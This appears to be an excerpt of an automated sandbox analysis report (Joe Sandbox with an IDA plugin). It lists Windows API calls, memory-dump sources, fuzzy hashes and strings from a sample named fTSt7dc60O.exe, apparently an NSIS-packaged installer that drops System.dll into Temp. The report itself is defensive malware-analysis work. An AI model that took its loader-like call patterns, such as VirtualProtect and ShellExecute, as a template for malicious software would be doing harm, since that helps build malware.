                                                      • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                      • Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
                                                      • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                      • Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                      • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                      • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                      APIs
                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileString
                                                      • String ID:
                                                      • API String ID: 1096422788-0
                                                      • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                      • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                      • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                      • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                      APIs
                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                      • Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
                                                      • Opcode Fuzzy Hash: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                      • Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A
                                                      APIs
                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                      • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                      • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                      • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                      • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                      • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                      • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                      APIs
                                                      • SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                      • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                      • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                      • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                      • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                      • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                      • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                      APIs
                                                      • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                      • Instruction ID: 43bd389e684fdc992c114de42b340604c9c8a7aa9960d5983178e32e9e1c03f3
                                                      • Opcode Fuzzy Hash: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                      • Instruction Fuzzy Hash: 42D0C9B7B141409BDB50EBB8AE8989B73A8E7913297204C73D942F20A1D178D8029A39
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                      • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                      • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                      • DeleteObject.GDI32(00000000), ref: 00404C64
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                      • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                      • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                      • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                      • ShowWindow.USER32(00000000), ref: 0040514F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 1638840714-813528018
                                                      • Opcode ID: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                                      • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                      • Opcode Fuzzy Hash: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                                      • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                      • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                      • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                      • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                        • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 0040623F
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406253
                                                        • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406266
                                                      • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                      • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                      • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$&B
                                                      • API String ID: 2246997448-1365839044
                                                      • Opcode ID: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
                                                      • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                      • Opcode Fuzzy Hash: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
                                                      • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                      • Instruction ID: 2908b39070a7deba1428861388b98b097f8f9174a2682adf846a4f1dff5e2c07
                                                      • Opcode Fuzzy Hash: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                      • Instruction Fuzzy Hash: D5F05EB16101149BCB00DBA4DD499BEB378FF04318F3005BAE151F31D0D6B859409B2A
                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                      • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                      • GetSysColor.USER32(?), ref: 00404417
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                      • lstrlenW.KERNEL32(?), ref: 00404438
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                      • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                      • SendMessageW.USER32(00000000), ref: 004044BA
                                                      • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                      • SetCursor.USER32(00000000), ref: 00404539
                                                      • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                      • SetCursor.USER32(00000000), ref: 0040455D
                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                      • String ID: Call$N$open
                                                      • API String ID: 3615053054-2563687911
                                                      • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                      • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                      • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                      • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                      APIs
                                                      • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                      • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                        • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                        • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                      • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                      • wsprintfA.USER32 ref: 00405CDE
                                                      • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                      • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                      • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 00405BB8
                                                        • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                      • API String ID: 1265525490-899692902
                                                      • Opcode ID: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                      • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                      • Opcode Fuzzy Hash: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                      • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                      • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                      • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                      • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                      APIs
                                                      • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                      • String ID: @H3w
                                                      • API String ID: 4216380887-4275297014
                                                      • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                      • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                      • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                      • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 0040623F
                                                      • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406253
                                                      • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406266
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                      • API String ID: 589700163-2730664359
                                                      • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                      • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                      • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                      • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                      • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                      • WriteFile.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ByteCharFileMultiWideWritelstrlen
                                                      • String ID: 8$C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp$C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll
                                                      • API String ID: 1453599865-907821908
                                                      • Opcode ID: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                      • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                      • Opcode Fuzzy Hash: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                      • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                      • GetSysColor.USER32(00000000), ref: 0040423A
                                                      • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                      • SetBkMode.GDI32(?,?), ref: 00404252
                                                      • GetSysColor.USER32(?), ref: 00404265
                                                      • SetBkColor.GDI32(?,?), ref: 00404275
                                                      • DeleteObject.GDI32(?), ref: 0040428F
                                                      • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                      • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                      • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                      • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                      APIs
